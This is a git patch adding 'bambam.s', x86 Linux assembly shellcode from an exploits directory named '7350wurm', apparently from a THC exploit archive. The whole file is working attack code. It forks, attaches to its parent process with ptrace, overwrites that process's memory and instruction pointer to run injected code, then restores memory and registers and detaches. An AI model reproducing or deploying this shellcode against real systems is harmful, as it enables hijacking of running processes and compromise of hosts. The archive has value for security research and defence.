From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001 From: Root THC Date: Tue, 24 Feb 2026 12:42:47 +0000 Subject: initial --- exploits/7350wurm/shellcode/bambam.s | 230 +++++++++++++++++++++++++++++++++++ 1 file changed, 230 insertions(+) create mode 100644 exploits/7350wurm/shellcode/bambam.s (limited to 'exploits/7350wurm/shellcode/bambam.s') diff --git a/exploits/7350wurm/shellcode/bambam.s b/exploits/7350wurm/shellcode/bambam.s new file mode 100644 index 0000000..5719ed7 --- /dev/null +++ b/exploits/7350wurm/shellcode/bambam.s @@ -0,0 +1,230 @@ + + .globl cbegin + .globl cend + + +cbegin: +/* getppid */ + pushl $64 + popl %eax + int $0x80 +/* movl %eax, %ecx */ + pushl %eax + xchgl %ebp, %eax + +/* z_fork */ + pushl $2 + popl %eax + int $0x80 + or %eax, %eax + je fchild + + /* waitpid (pid, NULL, 0) */ + pushl $7 + popl %esi + xchgl %esi, %eax /* eax = 7, esi = ppid */ + xorl %ecx, %ecx + xorl %edx, %edx + int $0x80 + + xorl %eax, %eax + movb $162, %al + pushl $10 + pushl $10 + movl %esp, %ebx + movl %esp, %ecx + int $0x80 +ui: +jmp ui + /* exit */ +fexit: + + pushl $1 + popl %eax + xorl %ebx, %ebx + int $0x80 + +/*** CHILD ***/ +fchild: pushl $2 /* second fork */ + popl %eax + int $0x80 + + or %eax, %eax + jne fexit + + popl %ecx /* parent process pid */ +/* ptrace attach */ + pushl $26 + popl %eax + cdq + pushl $16 + popl %ebx + xorl %esi, %esi + int $0x80 + +/* ptrace peekdata */ + movl $0x08048210, %edx +/* movl $0xbf7ff010, %edx */ + movl $0xbffff010, %esi + pushl $127 + popl %edi +loopa: + movl %ebp, %ecx + pushl $26 + popl %eax + pushl $2 + popl %ebx + pushl %edi + int $0x80 + popl %edi + incl %edx + incl %esi + decl %edi + jnz loopa + +/* ptrace getregs */ + movl %ebp, %ecx + pushl $26 + popl %eax + pushl $12 + popl %ebx + pusha + movl %esp, %esi + int $0x80 + +/* ptrace setregs */ + movl %ebp, %ecx + pushl $26 + popl %eax + pushl $13 + popl %ebx + movl %esp, %esi + movl 48(%esi), %edi + pushl %edi + movl $0x08048210, 48(%esi) +/* movl $0xbf7ff010, 48(%esi)*/ + int $0x80 + + jmp pointX +pointY: + + popl %esi + movl $0x08048210, %edx + pushl $20 + popl %edi +loopc: + movl %ebp, %ecx + pushl $26 + popl %eax + pushl $5 + popl %ebx + pushl %edi + pushl %esi + movl (%esi), %esi + int $0x80 + popl %esi + popl %edi + incl %edx + incl %esi + decl %edi + jnz loopc + + +/* ptrace pokedata */ +/* movl %ebp, %ecx + pushl $26 + popl %eax + pushl $5 + popl %ebx + movl $0xccccfeeb, %esi*/ +/* movl $0xbf7ff010, %edx*/ + movl $0x08048210, %edx +/* int $0x80*/ + +/*ptrace cont */ + movl %ebp, %ecx + pushl $26 + popl %eax + cdq + pushl $7 + popl %ebx + xorl %esi, %esi + int $0x80 + +/* wait 4 */ +/* 0 on return */ + cdq + movl %eax, %ebx + decl %ebx + movl %eax, %ecx + movb $114, %al + int $0x80 + +/* ptrace pokedata */ + movl $0x08048210, %edx + movl $0xbffff010, %esi +/* movl $0xbf7ff010, %edx*/ + pushl $127 + popl %edi +loopb: + movl %ebp, %ecx + pushl $26 + popl %eax + pushl $5 + popl %ebx + pushl %edi + pushl %esi + movl (%esi), %esi + int $0x80 + popl %esi + popl %edi + incl %edx + incl %esi + decl %edi + jnz loopb + +/* ptrace setregs */ + popl %edi + movl %ebp, %ecx + pushl $26 + popl %eax + pushl $13 + popl %ebx + movl %esp, %esi + movl %edi, 48(%esi) + int $0x80 + + +/* ptrace detach */ + movl %ebp, %ecx + pushl $17 + popl %ebx + pushl $26 + popl %eax + cdq + movl %edx, %esi + int $0x80 +/* exit */ + xorl %ecx, %ecx + incl %esi + xchgl %esi, %eax + int $0x80 +pointX: + call pointY + + pushl $2 /* second fork */ + popl %eax + int $0x80 + or %eax, %eax + je pointA + int $0x3 +pointA: + jmp pointA + + + + + +cend: + + -- cgit v1.3